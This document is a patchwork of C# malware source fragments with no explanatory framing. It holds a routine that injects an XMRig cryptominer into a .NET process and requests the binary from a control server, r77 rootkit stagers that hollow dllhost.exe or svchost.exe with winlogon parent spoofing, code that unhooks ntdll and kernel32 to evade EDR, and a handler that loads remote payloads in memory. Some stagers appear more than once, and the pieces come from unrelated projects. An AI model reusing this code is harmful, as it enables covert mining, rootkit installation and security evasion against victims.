public void RunMiner(MsgPack unpack_msgpack)
{
try
{
string xmrig = Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin";
string injectTo = unpack_msgpack.ForcePathObject("InjectTo").AsString;
string args = $"-B --donate-level=1 -t {Environment.ProcessorCount / 2} -v 0 --cpu-priority=3 -a cn/r -k -o {unpack_msgpack.ForcePathObject("Pool").AsString} -u {unpack_msgpack.ForcePathObject("Wallet").AsString} -p {unpack_msgpack.ForcePathObject("Pass").AsString}";
if (!File.Exists(xmrig))
{
//ask server to send xmrig
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "GetXmr";
Connection.Send(msgpack.Encode2Bytes());
return;
}
KillMiner();
if (RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injectTo), Zip.Decompress(File.ReadAllBytes(Path.GetTempPath() + unpack_msgpack.ForcePathObject("Hash").AsString + ".bin")), args, false))
{
SetRegistry.SetValue(Connection.Hwid, "1");
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
}
// The target framework is .NET 3.5.
// Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start.
// However, the target framework is not relevant in the powershell context.
// The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed.
// To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5.
public static void Main()
{
Process.EnterDebugMode();
// Get r77 service executable.
byte[] payload32 = Decompress(Decrypt(Resources.InstallService32));
byte[] payload64 = Decompress(Decrypt(Resources.InstallService64));
// Executable to be used for process hollowing.
string path = @"C:\Windows\System32\dllhost.exe";
string pathWow64 = @"C:\Windows\SysWOW64\dllhost.exe";
string commandLine = "/Processid:" + Guid.NewGuid().ToString("B"); // Random commandline to mimic an actual dllhost.exe commandline (has no effect).
// Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required.
int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id;
// Create the 32-bit and 64-bit instance of the r77 service.
if (Helper.Is64BitOperatingSystem())
{
if (IntPtr.Size == 4)
{
RunPE.Run(pathWow64, commandLine, payload32, parentProcessId);
}
else
{
RunPE.Run(path, commandLine, payload64, parentProcessId);
}
}
else
{
RunPE.Run(path, commandLine, payload32, parentProcessId);
}
}
// Loads Payload.exe (native executable) from resources and injects into suitable OS executable.
// This stage is required to be C#, because the startup stage may only contain C# code with a maximum of 260 characters for the commandline.
// The next stage is the actual payload, which is required to be a native executable in order to be injected.
public static void Main()
{
string path = Environment.Is64BitOperatingSystem ? @"C:\Windows\SysWOW64\svchost.exe" : @"C:\Windows\System32\svchost.exe";
byte[] payload = Decompress(Decrypt(Resources.Payload));
RunPE.Run(path, payload);
}
public void SendToMemory(MsgPack unpack_msgpack)
{
try
{
byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
if (injection.Length == 0)
{
//Reflection
new Thread(delegate()
{
try
{
Assembly loader = Assembly.Load(Methods.Decompress(buffer));
object[] parm = null;
if (loader.EntryPoint.GetParameters().Length > 0)
{
parm = new object[] { new string[] { null } };
}
loader.EntryPoint.Invoke(null, parm);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
})
{
IsBackground = true
}.Start();
}
else
{
//RunPE
new Thread(delegate()
{
try
{
RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), "", true);
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
})
{
IsBackground = true
}.Start();
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
Connection.Disconnected();
}
// The target framework is .NET 3.5.
// Normally, if .NET 4.x is installed, but .NET 3.5 isn't, this executable doesn't start.
// However, the target framework is not relevant in the powershell context.
// The executable will run, if *either* .NET 3.5 *or* .NET 4.x is installed.
// To immediately spot code that is incompatible with .NET 3.5, the target framework is set to .NET 3.5.
public static void Main()
{
// Unhook DLL's that are monitored by EDR.
// Otherwise, the call sequence analysis of process hollowing gets detected and the stager is terminated.
Unhook.UnhookDll("ntdll.dll");
if (Environment.OSVersion.Version.Major >= 10 || IntPtr.Size == 8)
{
// Unhooking kernel32.dll on Windows 7 x86 fails.
//TODO: Find out why unhooking kernel32.dll on Windows 7 x86 fails.
Unhook.UnhookDll("kernel32.dll");
}
Process.EnterDebugMode();
// Get r77 service executable.
byte[] payload32 = Decompress(Decrypt(Resources.InstallService32));
byte[] payload64 = Decompress(Decrypt(Resources.InstallService64));
// Executable to be used for process hollowing.
string path = @"C:\Windows\System32\dllhost.exe";
string pathWow64 = @"C:\Windows\SysWOW64\dllhost.exe";
string commandLine = "/Processid:" + Guid.NewGuid().ToString("B"); // Random commandline to mimic an actual dllhost.exe commandline (has no effect).
// Parent process spoofing can only be used on certain processes, particularly the PROCESS_CREATE_PROCESS privilege is required.
int parentProcessId = Process.GetProcessesByName("winlogon")[0].Id;
// Create the 32-bit and 64-bit instance of the r77 service.
if (Helper.Is64BitOperatingSystem())
{
if (IntPtr.Size == 4)
{
RunPE.Run(pathWow64, commandLine, payload32, parentProcessId);
}
else
{
RunPE.Run(path, commandLine, payload64, parentProcessId);
}
}
else
{
RunPE.Run(path, commandLine, payload32, parentProcessId);
}
}
public void Inject(byte[] payload, string target)
{
//Add actions if RunPe.Run returns false
RunPE.Run(payload, target);
}